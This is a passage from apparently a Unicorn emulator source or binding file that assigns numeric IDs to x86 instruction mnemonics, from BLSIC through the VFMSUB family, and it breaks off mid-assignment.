UC_X86_INS_BLSIC = 44; UC_X86_INS_BLSMSK = 45; UC_X86_INS_BLSR = 46; UC_X86_INS_BOUND = 47; UC_X86_INS_BSF = 48; UC_X86_INS_BSR = 49; UC_X86_INS_BSWAP = 50; UC_X86_INS_BT = 51; UC_X86_INS_BTC = 52; UC_X86_INS_BTR = 53; UC_X86_INS_BTS = 54; UC_X86_INS_BZHI = 55; UC_X86_INS_CALL = 56; UC_X86_INS_CBW = 57; UC_X86_INS_CDQ = 58; UC_X86_INS_CDQE = 59; UC_X86_INS_FCHS = 60; UC_X86_INS_CLAC = 61; UC_X86_INS_CLC = 62; UC_X86_INS_CLD = 63; UC_X86_INS_CLFLUSH = 64; UC_X86_INS_CLFLUSHOPT = 65; UC_X86_INS_CLGI = 66; UC_X86_INS_CLI = 67; UC_X86_INS_CLTS = 68; UC_X86_INS_CLWB = 69; UC_X86_INS_CMC = 70; UC_X86_INS_CMOVA = 71; UC_X86_INS_CMOVAE = 72; UC_X86_INS_CMOVB = 73; UC_X86_INS_CMOVBE = 74; UC_X86_INS_FCMOVBE = 75; UC_X86_INS_FCMOVB = 76; UC_X86_INS_CMOVE = 77; UC_X86_INS_FCMOVE = 78; UC_X86_INS_CMOVG = 79; UC_X86_INS_CMOVGE = 80; UC_X86_INS_CMOVL = 81; UC_X86_INS_CMOVLE = 82; UC_X86_INS_FCMOVNBE = 83; UC_X86_INS_FCMOVNB = 84; UC_X86_INS_CMOVNE = 85; UC_X86_INS_FCMOVNE = 86; UC_X86_INS_CMOVNO = 87; UC_X86_INS_CMOVNP = 88; UC_X86_INS_FCMOVNU = 89; UC_X86_INS_CMOVNS = 90; UC_X86_INS_CMOVO = 91; UC_X86_INS_CMOVP = 92; UC_X86_INS_FCMOVU = 93; UC_X86_INS_CMOVS = 94; UC_X86_INS_CMP = 95; UC_X86_INS_CMPPD = 96; UC_X86_INS_CMPPS = 97; UC_X86_INS_CMPSB = 98; UC_X86_INS_CMPSD = 99; UC_X86_INS_CMPSQ = 100; UC_X86_INS_CMPSS = 101; UC_X86_INS_CMPSW = 102; UC_X86_INS_CMPXCHG16B = 103; UC_X86_INS_CMPXCHG = 104; UC_X86_INS_CMPXCHG8B = 105; UC_X86_INS_COMISD = 106; UC_X86_INS_COMISS = 107; UC_X86_INS_FCOMP = 108; UC_X86_INS_FCOMPI = 109; UC_X86_INS_FCOMI = 110; UC_X86_INS_FCOM = 111; UC_X86_INS_FCOS = 112; 
UC_X86_INS_CPUID = 113; UC_X86_INS_CQO = 114; UC_X86_INS_CRC32 = 115; UC_X86_INS_CVTDQ2PD = 116; UC_X86_INS_CVTDQ2PS = 117; UC_X86_INS_CVTPD2DQ = 118; UC_X86_INS_CVTPD2PS = 119; UC_X86_INS_CVTPS2DQ = 120; UC_X86_INS_CVTPS2PD = 121; UC_X86_INS_CVTSD2SI = 122; UC_X86_INS_CVTSD2SS = 123; UC_X86_INS_CVTSI2SD = 124; UC_X86_INS_CVTSI2SS = 125; UC_X86_INS_CVTSS2SD = 126; UC_X86_INS_CVTSS2SI = 127; UC_X86_INS_CVTTPD2DQ = 128; UC_X86_INS_CVTTPS2DQ = 129; UC_X86_INS_CVTTSD2SI = 130; UC_X86_INS_CVTTSS2SI = 131; UC_X86_INS_CWD = 132; UC_X86_INS_CWDE = 133; UC_X86_INS_DAA = 134; UC_X86_INS_DAS = 135; UC_X86_INS_DATA16 = 136; UC_X86_INS_DEC = 137; UC_X86_INS_DIV = 138; UC_X86_INS_DIVPD = 139; UC_X86_INS_DIVPS = 140; UC_X86_INS_FDIVR = 141; UC_X86_INS_FIDIVR = 142; UC_X86_INS_FDIVRP = 143; UC_X86_INS_DIVSD = 144; UC_X86_INS_DIVSS = 145; UC_X86_INS_FDIV = 146; UC_X86_INS_FIDIV = 147; UC_X86_INS_FDIVP = 148; UC_X86_INS_DPPD = 149; UC_X86_INS_DPPS = 150; UC_X86_INS_RET = 151; UC_X86_INS_ENCLS = 152; UC_X86_INS_ENCLU = 153; UC_X86_INS_ENTER = 154; UC_X86_INS_EXTRACTPS = 155; UC_X86_INS_EXTRQ = 156; UC_X86_INS_F2XM1 = 157; UC_X86_INS_LCALL = 158; UC_X86_INS_LJMP = 159; UC_X86_INS_FBLD = 160; UC_X86_INS_FBSTP = 161; UC_X86_INS_FCOMPP = 162; UC_X86_INS_FDECSTP = 163; UC_X86_INS_FEMMS = 164; UC_X86_INS_FFREE = 165; UC_X86_INS_FICOM = 166; UC_X86_INS_FICOMP = 167; UC_X86_INS_FINCSTP = 168; UC_X86_INS_FLDCW = 169; UC_X86_INS_FLDENV = 170; UC_X86_INS_FLDL2E = 171; UC_X86_INS_FLDL2T = 172; UC_X86_INS_FLDLG2 = 173; UC_X86_INS_FLDLN2 = 174; UC_X86_INS_FLDPI = 175; UC_X86_INS_FNCLEX = 176; UC_X86_INS_FNINIT = 177; UC_X86_INS_FNOP = 178; UC_X86_INS_FNSTCW = 179; UC_X86_INS_FNSTSW = 180; UC_X86_INS_FPATAN = 181; UC_X86_INS_FPREM = 182; UC_X86_INS_FPREM1 = 183; UC_X86_INS_FPTAN = 184; UC_X86_INS_FFREEP = 185; UC_X86_INS_FRNDINT = 186; UC_X86_INS_FRSTOR = 187; UC_X86_INS_FNSAVE = 188; UC_X86_INS_FSCALE = 189; UC_X86_INS_FSETPM = 190; UC_X86_INS_FSINCOS = 191; UC_X86_INS_FNSTENV = 192; UC_X86_INS_FXAM = 193; UC_X86_INS_FXRSTOR = 194; UC_X86_INS_FXRSTOR64 = 195; UC_X86_INS_FXSAVE = 196; UC_X86_INS_FXSAVE64 = 197; UC_X86_INS_FXTRACT = 198; UC_X86_INS_FYL2X = 199; UC_X86_INS_FYL2XP1 = 200; UC_X86_INS_MOVAPD = 201; UC_X86_INS_MOVAPS = 202; UC_X86_INS_ORPD = 203; UC_X86_INS_ORPS = 204; UC_X86_INS_VMOVAPD = 205; UC_X86_INS_VMOVAPS = 206; UC_X86_INS_XORPD = 207; UC_X86_INS_XORPS = 208; UC_X86_INS_GETSEC = 209; UC_X86_INS_HADDPD = 210; UC_X86_INS_HADDPS = 211; UC_X86_INS_HLT = 212; UC_X86_INS_HSUBPD = 213; UC_X86_INS_HSUBPS = 214; UC_X86_INS_IDIV = 215; UC_X86_INS_FILD = 216; UC_X86_INS_IMUL = 217; UC_X86_INS_IN = 218; UC_X86_INS_INC = 219; UC_X86_INS_INSB = 220; UC_X86_INS_INSERTPS = 221; UC_X86_INS_INSERTQ = 222; UC_X86_INS_INSD = 223; UC_X86_INS_INSW = 224; UC_X86_INS_INT = 225; UC_X86_INS_INT1 = 226; UC_X86_INS_INT3 = 227; UC_X86_INS_INTO = 228; UC_X86_INS_INVD = 229; UC_X86_INS_INVEPT = 230; UC_X86_INS_INVLPG = 231; UC_X86_INS_INVLPGA = 232; UC_X86_INS_INVPCID = 233; UC_X86_INS_INVVPID = 234; UC_X86_INS_IRET = 235; UC_X86_INS_IRETD = 236; UC_X86_INS_IRETQ = 237; UC_X86_INS_FISTTP = 238; UC_X86_INS_FIST = 239; UC_X86_INS_FISTP = 240; UC_X86_INS_UCOMISD = 241; UC_X86_INS_UCOMISS = 242; UC_X86_INS_VCOMISD = 243; UC_X86_INS_VCOMISS = 244; UC_X86_INS_VCVTSD2SS = 245; UC_X86_INS_VCVTSI2SD = 246; UC_X86_INS_VCVTSI2SS = 247; UC_X86_INS_VCVTSS2SD = 248; UC_X86_INS_VCVTTSD2SI = 249; UC_X86_INS_VCVTTSD2USI = 250; UC_X86_INS_VCVTTSS2SI = 251; UC_X86_INS_VCVTTSS2USI = 252; UC_X86_INS_VCVTUSI2SD = 253; UC_X86_INS_VCVTUSI2SS = 254; 
UC_X86_INS_VUCOMISD = 255; UC_X86_INS_VUCOMISS = 256; UC_X86_INS_JAE = 257; UC_X86_INS_JA = 258; UC_X86_INS_JBE = 259; UC_X86_INS_JB = 260; UC_X86_INS_JCXZ = 261; UC_X86_INS_JECXZ = 262; UC_X86_INS_JE = 263; UC_X86_INS_JGE = 264; UC_X86_INS_JG = 265; UC_X86_INS_JLE = 266; UC_X86_INS_JL = 267; UC_X86_INS_JMP = 268; UC_X86_INS_JNE = 269; UC_X86_INS_JNO = 270; UC_X86_INS_JNP = 271; UC_X86_INS_JNS = 272; UC_X86_INS_JO = 273; UC_X86_INS_JP = 274; UC_X86_INS_JRCXZ = 275; UC_X86_INS_JS = 276; UC_X86_INS_KANDB = 277; UC_X86_INS_KANDD = 278; UC_X86_INS_KANDNB = 279; UC_X86_INS_KANDND = 280; UC_X86_INS_KANDNQ = 281; UC_X86_INS_KANDNW = 282; UC_X86_INS_KANDQ = 283; UC_X86_INS_KANDW = 284; UC_X86_INS_KMOVB = 285; UC_X86_INS_KMOVD = 286; UC_X86_INS_KMOVQ = 287; UC_X86_INS_KMOVW = 288; UC_X86_INS_KNOTB = 289; UC_X86_INS_KNOTD = 290; UC_X86_INS_KNOTQ = 291; UC_X86_INS_KNOTW = 292; UC_X86_INS_KORB = 293; UC_X86_INS_KORD = 294; UC_X86_INS_KORQ = 295; UC_X86_INS_KORTESTB = 296; UC_X86_INS_KORTESTD = 297; UC_X86_INS_KORTESTQ = 298; UC_X86_INS_KORTESTW = 299; UC_X86_INS_KORW = 300; UC_X86_INS_KSHIFTLB = 301; UC_X86_INS_KSHIFTLD = 302; UC_X86_INS_KSHIFTLQ = 303; UC_X86_INS_KSHIFTLW = 304; UC_X86_INS_KSHIFTRB = 305; UC_X86_INS_KSHIFTRD = 306; UC_X86_INS_KSHIFTRQ = 307; UC_X86_INS_KSHIFTRW = 308; UC_X86_INS_KUNPCKBW = 309; UC_X86_INS_KXNORB = 310; UC_X86_INS_KXNORD = 311; UC_X86_INS_KXNORQ = 312; UC_X86_INS_KXNORW = 313; UC_X86_INS_KXORB = 314; UC_X86_INS_KXORD = 315; UC_X86_INS_KXORQ = 316; UC_X86_INS_KXORW = 317; UC_X86_INS_LAHF = 318; UC_X86_INS_LAR = 319; UC_X86_INS_LDDQU = 320; UC_X86_INS_LDMXCSR = 321; UC_X86_INS_LDS = 322; UC_X86_INS_FLDZ = 323; UC_X86_INS_FLD1 = 324; UC_X86_INS_FLD = 325; UC_X86_INS_LEA = 326; UC_X86_INS_LEAVE = 327; UC_X86_INS_LES = 328; UC_X86_INS_LFENCE = 329; UC_X86_INS_LFS = 330; UC_X86_INS_LGDT = 331; UC_X86_INS_LGS = 332; UC_X86_INS_LIDT = 333; UC_X86_INS_LLDT = 334; UC_X86_INS_LMSW = 335; UC_X86_INS_OR = 336; UC_X86_INS_SUB = 337; UC_X86_INS_XOR = 338; UC_X86_INS_LODSB = 339; UC_X86_INS_LODSD = 340; UC_X86_INS_LODSQ = 341; UC_X86_INS_LODSW = 342; UC_X86_INS_LOOP = 343; UC_X86_INS_LOOPE = 344; UC_X86_INS_LOOPNE = 345; UC_X86_INS_RETF = 346; UC_X86_INS_RETFQ = 347; UC_X86_INS_LSL = 348; UC_X86_INS_LSS = 349; UC_X86_INS_LTR = 350; UC_X86_INS_XADD = 351; UC_X86_INS_LZCNT = 352; UC_X86_INS_MASKMOVDQU = 353; UC_X86_INS_MAXPD = 354; UC_X86_INS_MAXPS = 355; UC_X86_INS_MAXSD = 356; UC_X86_INS_MAXSS = 357; UC_X86_INS_MFENCE = 358; UC_X86_INS_MINPD = 359; UC_X86_INS_MINPS = 360; UC_X86_INS_MINSD = 361; UC_X86_INS_MINSS = 362; UC_X86_INS_CVTPD2PI = 363; UC_X86_INS_CVTPI2PD = 364; UC_X86_INS_CVTPI2PS = 365; UC_X86_INS_CVTPS2PI = 366; UC_X86_INS_CVTTPD2PI = 367; UC_X86_INS_CVTTPS2PI = 368; UC_X86_INS_EMMS = 369; UC_X86_INS_MASKMOVQ = 370; UC_X86_INS_MOVD = 371; UC_X86_INS_MOVDQ2Q = 372; UC_X86_INS_MOVNTQ = 373; UC_X86_INS_MOVQ2DQ = 374; UC_X86_INS_MOVQ = 375; UC_X86_INS_PABSB = 376; UC_X86_INS_PABSD = 377; UC_X86_INS_PABSW = 378; UC_X86_INS_PACKSSDW = 379; UC_X86_INS_PACKSSWB = 380; UC_X86_INS_PACKUSWB = 381; UC_X86_INS_PADDB = 382; UC_X86_INS_PADDD = 383; UC_X86_INS_PADDQ = 384; UC_X86_INS_PADDSB = 385; UC_X86_INS_PADDSW = 386; UC_X86_INS_PADDUSB = 387; UC_X86_INS_PADDUSW = 388; UC_X86_INS_PADDW = 389; UC_X86_INS_PALIGNR = 390; UC_X86_INS_PANDN = 391; UC_X86_INS_PAND = 392; UC_X86_INS_PAVGB = 393; UC_X86_INS_PAVGW = 394; UC_X86_INS_PCMPEQB = 395; UC_X86_INS_PCMPEQD = 396; UC_X86_INS_PCMPEQW = 397; UC_X86_INS_PCMPGTB = 398; UC_X86_INS_PCMPGTD = 399; UC_X86_INS_PCMPGTW = 400; UC_X86_INS_PEXTRW 
= 401; UC_X86_INS_PHADDSW = 402; UC_X86_INS_PHADDW = 403; UC_X86_INS_PHADDD = 404; UC_X86_INS_PHSUBD = 405; UC_X86_INS_PHSUBSW = 406; UC_X86_INS_PHSUBW = 407; UC_X86_INS_PINSRW = 408; UC_X86_INS_PMADDUBSW = 409; UC_X86_INS_PMADDWD = 410; UC_X86_INS_PMAXSW = 411; UC_X86_INS_PMAXUB = 412; UC_X86_INS_PMINSW = 413; UC_X86_INS_PMINUB = 414; UC_X86_INS_PMOVMSKB = 415; UC_X86_INS_PMULHRSW = 416; UC_X86_INS_PMULHUW = 417; UC_X86_INS_PMULHW = 418; UC_X86_INS_PMULLW = 419; UC_X86_INS_PMULUDQ = 420; UC_X86_INS_POR = 421; UC_X86_INS_PSADBW = 422; UC_X86_INS_PSHUFB = 423; UC_X86_INS_PSHUFW = 424; UC_X86_INS_PSIGNB = 425; UC_X86_INS_PSIGND = 426; UC_X86_INS_PSIGNW = 427; UC_X86_INS_PSLLD = 428; UC_X86_INS_PSLLQ = 429; UC_X86_INS_PSLLW = 430; UC_X86_INS_PSRAD = 431; UC_X86_INS_PSRAW = 432; UC_X86_INS_PSRLD = 433; UC_X86_INS_PSRLQ = 434; UC_X86_INS_PSRLW = 435; UC_X86_INS_PSUBB = 436; UC_X86_INS_PSUBD = 437; UC_X86_INS_PSUBQ = 438; UC_X86_INS_PSUBSB = 439; UC_X86_INS_PSUBSW = 440; UC_X86_INS_PSUBUSB = 441; UC_X86_INS_PSUBUSW = 442; UC_X86_INS_PSUBW = 443; UC_X86_INS_PUNPCKHBW = 444; UC_X86_INS_PUNPCKHDQ = 445; UC_X86_INS_PUNPCKHWD = 446; UC_X86_INS_PUNPCKLBW = 447; UC_X86_INS_PUNPCKLDQ = 448; UC_X86_INS_PUNPCKLWD = 449; UC_X86_INS_PXOR = 450; UC_X86_INS_MONITOR = 451; UC_X86_INS_MONTMUL = 452; UC_X86_INS_MOV = 453; UC_X86_INS_MOVABS = 454; UC_X86_INS_MOVBE = 455; UC_X86_INS_MOVDDUP = 456; UC_X86_INS_MOVDQA = 457; UC_X86_INS_MOVDQU = 458; UC_X86_INS_MOVHLPS = 459; UC_X86_INS_MOVHPD = 460; UC_X86_INS_MOVHPS = 461; UC_X86_INS_MOVLHPS = 462; UC_X86_INS_MOVLPD = 463; UC_X86_INS_MOVLPS = 464; UC_X86_INS_MOVMSKPD = 465; UC_X86_INS_MOVMSKPS = 466; UC_X86_INS_MOVNTDQA = 467; UC_X86_INS_MOVNTDQ = 468; UC_X86_INS_MOVNTI = 469; UC_X86_INS_MOVNTPD = 470; UC_X86_INS_MOVNTPS = 471; UC_X86_INS_MOVNTSD = 472; UC_X86_INS_MOVNTSS = 473; UC_X86_INS_MOVSB = 474; UC_X86_INS_MOVSD = 475; UC_X86_INS_MOVSHDUP = 476; UC_X86_INS_MOVSLDUP = 477; UC_X86_INS_MOVSQ = 478; UC_X86_INS_MOVSS = 479; UC_X86_INS_MOVSW = 480; UC_X86_INS_MOVSX = 481; UC_X86_INS_MOVSXD = 482; UC_X86_INS_MOVUPD = 483; UC_X86_INS_MOVUPS = 484; UC_X86_INS_MOVZX = 485; UC_X86_INS_MPSADBW = 486; UC_X86_INS_MUL = 487; UC_X86_INS_MULPD = 488; UC_X86_INS_MULPS = 489; UC_X86_INS_MULSD = 490; UC_X86_INS_MULSS = 491; UC_X86_INS_MULX = 492; UC_X86_INS_FMUL = 493; UC_X86_INS_FIMUL = 494; UC_X86_INS_FMULP = 495; UC_X86_INS_MWAIT = 496; UC_X86_INS_NEG = 497; UC_X86_INS_NOP = 498; UC_X86_INS_NOT = 499; UC_X86_INS_OUT = 500; UC_X86_INS_OUTSB = 501; UC_X86_INS_OUTSD = 502; UC_X86_INS_OUTSW = 503; UC_X86_INS_PACKUSDW = 504; UC_X86_INS_PAUSE = 505; UC_X86_INS_PAVGUSB = 506; UC_X86_INS_PBLENDVB = 507; UC_X86_INS_PBLENDW = 508; UC_X86_INS_PCLMULQDQ = 509; UC_X86_INS_PCMPEQQ = 510; UC_X86_INS_PCMPESTRI = 511; UC_X86_INS_PCMPESTRM = 512; UC_X86_INS_PCMPGTQ = 513; UC_X86_INS_PCMPISTRI = 514; UC_X86_INS_PCMPISTRM = 515; UC_X86_INS_PCOMMIT = 516; UC_X86_INS_PDEP = 517; UC_X86_INS_PEXT = 518; UC_X86_INS_PEXTRB = 519; UC_X86_INS_PEXTRD = 520; UC_X86_INS_PEXTRQ = 521; UC_X86_INS_PF2ID = 522; UC_X86_INS_PF2IW = 523; UC_X86_INS_PFACC = 524; UC_X86_INS_PFADD = 525; UC_X86_INS_PFCMPEQ = 526; UC_X86_INS_PFCMPGE = 527; UC_X86_INS_PFCMPGT = 528; UC_X86_INS_PFMAX = 529; UC_X86_INS_PFMIN = 530; UC_X86_INS_PFMUL = 531; UC_X86_INS_PFNACC = 532; UC_X86_INS_PFPNACC = 533; UC_X86_INS_PFRCPIT1 = 534; UC_X86_INS_PFRCPIT2 = 535; UC_X86_INS_PFRCP = 536; UC_X86_INS_PFRSQIT1 = 537; UC_X86_INS_PFRSQRT = 538; UC_X86_INS_PFSUBR = 539; UC_X86_INS_PFSUB = 540; UC_X86_INS_PHMINPOSUW = 541; UC_X86_INS_PI2FD = 542; 
UC_X86_INS_PI2FW = 543; UC_X86_INS_PINSRB = 544; UC_X86_INS_PINSRD = 545; UC_X86_INS_PINSRQ = 546; UC_X86_INS_PMAXSB = 547; UC_X86_INS_PMAXSD = 548; UC_X86_INS_PMAXUD = 549; UC_X86_INS_PMAXUW = 550; UC_X86_INS_PMINSB = 551; UC_X86_INS_PMINSD = 552; UC_X86_INS_PMINUD = 553; UC_X86_INS_PMINUW = 554; UC_X86_INS_PMOVSXBD = 555; UC_X86_INS_PMOVSXBQ = 556; UC_X86_INS_PMOVSXBW = 557; UC_X86_INS_PMOVSXDQ = 558; UC_X86_INS_PMOVSXWD = 559; UC_X86_INS_PMOVSXWQ = 560; UC_X86_INS_PMOVZXBD = 561; UC_X86_INS_PMOVZXBQ = 562; UC_X86_INS_PMOVZXBW = 563; UC_X86_INS_PMOVZXDQ = 564; UC_X86_INS_PMOVZXWD = 565; UC_X86_INS_PMOVZXWQ = 566; UC_X86_INS_PMULDQ = 567; UC_X86_INS_PMULHRW = 568; UC_X86_INS_PMULLD = 569; UC_X86_INS_POP = 570; UC_X86_INS_POPAW = 571; UC_X86_INS_POPAL = 572; UC_X86_INS_POPCNT = 573; UC_X86_INS_POPF = 574; UC_X86_INS_POPFD = 575; UC_X86_INS_POPFQ = 576; UC_X86_INS_PREFETCH = 577; UC_X86_INS_PREFETCHNTA = 578; UC_X86_INS_PREFETCHT0 = 579; UC_X86_INS_PREFETCHT1 = 580; UC_X86_INS_PREFETCHT2 = 581; UC_X86_INS_PREFETCHW = 582; UC_X86_INS_PSHUFD = 583; UC_X86_INS_PSHUFHW = 584; UC_X86_INS_PSHUFLW = 585; UC_X86_INS_PSLLDQ = 586; UC_X86_INS_PSRLDQ = 587; UC_X86_INS_PSWAPD = 588; UC_X86_INS_PTEST = 589; UC_X86_INS_PUNPCKHQDQ = 590; UC_X86_INS_PUNPCKLQDQ = 591; UC_X86_INS_PUSH = 592; UC_X86_INS_PUSHAW = 593; UC_X86_INS_PUSHAL = 594; UC_X86_INS_PUSHF = 595; UC_X86_INS_PUSHFD = 596; UC_X86_INS_PUSHFQ = 597; UC_X86_INS_RCL = 598; UC_X86_INS_RCPPS = 599; UC_X86_INS_RCPSS = 600; UC_X86_INS_RCR = 601; UC_X86_INS_RDFSBASE = 602; UC_X86_INS_RDGSBASE = 603; UC_X86_INS_RDMSR = 604; UC_X86_INS_RDPMC = 605; UC_X86_INS_RDRAND = 606; UC_X86_INS_RDSEED = 607; UC_X86_INS_RDTSC = 608; UC_X86_INS_RDTSCP = 609; UC_X86_INS_ROL = 610; UC_X86_INS_ROR = 611; UC_X86_INS_RORX = 612; UC_X86_INS_ROUNDPD = 613; UC_X86_INS_ROUNDPS = 614; UC_X86_INS_ROUNDSD = 615; UC_X86_INS_ROUNDSS = 616; UC_X86_INS_RSM = 617; UC_X86_INS_RSQRTPS = 618; UC_X86_INS_RSQRTSS = 619; UC_X86_INS_SAHF = 620; UC_X86_INS_SAL = 621; UC_X86_INS_SALC = 622; UC_X86_INS_SAR = 623; UC_X86_INS_SARX = 624; UC_X86_INS_SBB = 625; UC_X86_INS_SCASB = 626; UC_X86_INS_SCASD = 627; UC_X86_INS_SCASQ = 628; UC_X86_INS_SCASW = 629; UC_X86_INS_SETAE = 630; UC_X86_INS_SETA = 631; UC_X86_INS_SETBE = 632; UC_X86_INS_SETB = 633; UC_X86_INS_SETE = 634; UC_X86_INS_SETGE = 635; UC_X86_INS_SETG = 636; UC_X86_INS_SETLE = 637; UC_X86_INS_SETL = 638; UC_X86_INS_SETNE = 639; UC_X86_INS_SETNO = 640; UC_X86_INS_SETNP = 641; UC_X86_INS_SETNS = 642; UC_X86_INS_SETO = 643; UC_X86_INS_SETP = 644; UC_X86_INS_SETS = 645; UC_X86_INS_SFENCE = 646; UC_X86_INS_SGDT = 647; UC_X86_INS_SHA1MSG1 = 648; UC_X86_INS_SHA1MSG2 = 649; UC_X86_INS_SHA1NEXTE = 650; UC_X86_INS_SHA1RNDS4 = 651; UC_X86_INS_SHA256MSG1 = 652; UC_X86_INS_SHA256MSG2 = 653; UC_X86_INS_SHA256RNDS2 = 654; UC_X86_INS_SHL = 655; UC_X86_INS_SHLD = 656; UC_X86_INS_SHLX = 657; UC_X86_INS_SHR = 658; UC_X86_INS_SHRD = 659; UC_X86_INS_SHRX = 660; UC_X86_INS_SHUFPD = 661; UC_X86_INS_SHUFPS = 662; UC_X86_INS_SIDT = 663; UC_X86_INS_FSIN = 664; UC_X86_INS_SKINIT = 665; UC_X86_INS_SLDT = 666; UC_X86_INS_SMSW = 667; UC_X86_INS_SQRTPD = 668; UC_X86_INS_SQRTPS = 669; UC_X86_INS_SQRTSD = 670; UC_X86_INS_SQRTSS = 671; UC_X86_INS_FSQRT = 672; UC_X86_INS_STAC = 673; UC_X86_INS_STC = 674; UC_X86_INS_STD = 675; UC_X86_INS_STGI = 676; UC_X86_INS_STI = 677; UC_X86_INS_STMXCSR = 678; UC_X86_INS_STOSB = 679; UC_X86_INS_STOSD = 680; UC_X86_INS_STOSQ = 681; UC_X86_INS_STOSW = 682; UC_X86_INS_STR = 683; UC_X86_INS_FST = 684; UC_X86_INS_FSTP = 685; 
UC_X86_INS_FSTPNCE = 686; UC_X86_INS_FXCH = 687; UC_X86_INS_SUBPD = 688; UC_X86_INS_SUBPS = 689; UC_X86_INS_FSUBR = 690; UC_X86_INS_FISUBR = 691; UC_X86_INS_FSUBRP = 692; UC_X86_INS_SUBSD = 693; UC_X86_INS_SUBSS = 694; UC_X86_INS_FSUB = 695; UC_X86_INS_FISUB = 696; UC_X86_INS_FSUBP = 697; UC_X86_INS_SWAPGS = 698; UC_X86_INS_SYSCALL = 699; UC_X86_INS_SYSENTER = 700; UC_X86_INS_SYSEXIT = 701; UC_X86_INS_SYSRET = 702; UC_X86_INS_T1MSKC = 703; UC_X86_INS_TEST = 704; UC_X86_INS_UD2 = 705; UC_X86_INS_FTST = 706; UC_X86_INS_TZCNT = 707; UC_X86_INS_TZMSK = 708; UC_X86_INS_FUCOMPI = 709; UC_X86_INS_FUCOMI = 710; UC_X86_INS_FUCOMPP = 711; UC_X86_INS_FUCOMP = 712; UC_X86_INS_FUCOM = 713; UC_X86_INS_UD2B = 714; UC_X86_INS_UNPCKHPD = 715; UC_X86_INS_UNPCKHPS = 716; UC_X86_INS_UNPCKLPD = 717; UC_X86_INS_UNPCKLPS = 718; UC_X86_INS_VADDPD = 719; UC_X86_INS_VADDPS = 720; UC_X86_INS_VADDSD = 721; UC_X86_INS_VADDSS = 722; UC_X86_INS_VADDSUBPD = 723; UC_X86_INS_VADDSUBPS = 724; UC_X86_INS_VAESDECLAST = 725; UC_X86_INS_VAESDEC = 726; UC_X86_INS_VAESENCLAST = 727; UC_X86_INS_VAESENC = 728; UC_X86_INS_VAESIMC = 729; UC_X86_INS_VAESKEYGENASSIST = 730; UC_X86_INS_VALIGND = 731; UC_X86_INS_VALIGNQ = 732; UC_X86_INS_VANDNPD = 733; UC_X86_INS_VANDNPS = 734; UC_X86_INS_VANDPD = 735; UC_X86_INS_VANDPS = 736; UC_X86_INS_VBLENDMPD = 737; UC_X86_INS_VBLENDMPS = 738; UC_X86_INS_VBLENDPD = 739; UC_X86_INS_VBLENDPS = 740; UC_X86_INS_VBLENDVPD = 741; UC_X86_INS_VBLENDVPS = 742; UC_X86_INS_VBROADCASTF128 = 743; UC_X86_INS_VBROADCASTI32X4 = 744; UC_X86_INS_VBROADCASTI64X4 = 745; UC_X86_INS_VBROADCASTSD = 746; UC_X86_INS_VBROADCASTSS = 747; UC_X86_INS_VCMPPD = 748; UC_X86_INS_VCMPPS = 749; UC_X86_INS_VCMPSD = 750; UC_X86_INS_VCMPSS = 751; UC_X86_INS_VCOMPRESSPD = 752; UC_X86_INS_VCOMPRESSPS = 753; UC_X86_INS_VCVTDQ2PD = 754; UC_X86_INS_VCVTDQ2PS = 755; UC_X86_INS_VCVTPD2DQX = 756; UC_X86_INS_VCVTPD2DQ = 757; UC_X86_INS_VCVTPD2PSX = 758; UC_X86_INS_VCVTPD2PS = 759; UC_X86_INS_VCVTPD2UDQ = 760; UC_X86_INS_VCVTPH2PS = 761; UC_X86_INS_VCVTPS2DQ = 762; UC_X86_INS_VCVTPS2PD = 763; UC_X86_INS_VCVTPS2PH = 764; UC_X86_INS_VCVTPS2UDQ = 765; UC_X86_INS_VCVTSD2SI = 766; UC_X86_INS_VCVTSD2USI = 767; UC_X86_INS_VCVTSS2SI = 768; UC_X86_INS_VCVTSS2USI = 769; UC_X86_INS_VCVTTPD2DQX = 770; UC_X86_INS_VCVTTPD2DQ = 771; UC_X86_INS_VCVTTPD2UDQ = 772; UC_X86_INS_VCVTTPS2DQ = 773; UC_X86_INS_VCVTTPS2UDQ = 774; UC_X86_INS_VCVTUDQ2PD = 775; UC_X86_INS_VCVTUDQ2PS = 776; UC_X86_INS_VDIVPD = 777; UC_X86_INS_VDIVPS = 778; UC_X86_INS_VDIVSD = 779; UC_X86_INS_VDIVSS = 780; UC_X86_INS_VDPPD = 781; UC_X86_INS_VDPPS = 782; UC_X86_INS_VERR = 783; UC_X86_INS_VERW = 784; UC_X86_INS_VEXP2PD = 785; UC_X86_INS_VEXP2PS = 786; UC_X86_INS_VEXPANDPD = 787; UC_X86_INS_VEXPANDPS = 788; UC_X86_INS_VEXTRACTF128 = 789; UC_X86_INS_VEXTRACTF32X4 = 790; UC_X86_INS_VEXTRACTF64X4 = 791; UC_X86_INS_VEXTRACTI128 = 792; UC_X86_INS_VEXTRACTI32X4 = 793; UC_X86_INS_VEXTRACTI64X4 = 794; UC_X86_INS_VEXTRACTPS = 795; UC_X86_INS_VFMADD132PD = 796; UC_X86_INS_VFMADD132PS = 797; UC_X86_INS_VFMADDPD = 798; UC_X86_INS_VFMADD213PD = 799; UC_X86_INS_VFMADD231PD = 800; UC_X86_INS_VFMADDPS = 801; UC_X86_INS_VFMADD213PS = 802; UC_X86_INS_VFMADD231PS = 803; UC_X86_INS_VFMADDSD = 804; UC_X86_INS_VFMADD213SD = 805; UC_X86_INS_VFMADD132SD = 806; UC_X86_INS_VFMADD231SD = 807; UC_X86_INS_VFMADDSS = 808; UC_X86_INS_VFMADD213SS = 809; UC_X86_INS_VFMADD132SS = 810; UC_X86_INS_VFMADD231SS = 811; UC_X86_INS_VFMADDSUB132PD = 812; UC_X86_INS_VFMADDSUB132PS = 813; UC_X86_INS_VFMADDSUBPD = 814; 
UC_X86_INS_VFMADDSUB213PD = 815; UC_X86_INS_VFMADDSUB231PD = 816; UC_X86_INS_VFMADDSUBPS = 817; UC_X86_INS_VFMADDSUB213PS = 818; UC_X86_INS_VFMADDSUB231PS = 819; UC_X86_INS_VFMSUB132PD = 820; UC_X86_INS_VFMSUB132PS = 821; UC_X86_INS_VFMSUBADD132PD = 822; UC_X86_INS_VFMSUBADD132PS = 823; UC_X86_INS_VFMSUBADDPD = 824; UC_X86_INS_VFMSUBADD213PD = 825; UC_X86_INS_VFMSUBADD231PD = 826; UC_X86_INS_VFMSUBADDPS = 827; UC_X86_INS_VFMSUBADD213PS = 828; UC_X86_INS_VFMSUBADD231PS = 829; UC_X86_INS_VFMSUBPD = 830; UC_X86_INS_VFMSUB213PD = 831; UC_X86_INS_VFMSUB231PD = 832; UC_X86_INS_VFMSUBPS = 833; UC_X86_INS_VFMSUB213PS = 834; UC_X86_INS_VFMSUB231PS = 835; UC_X86_INS_VFMSUBSD = 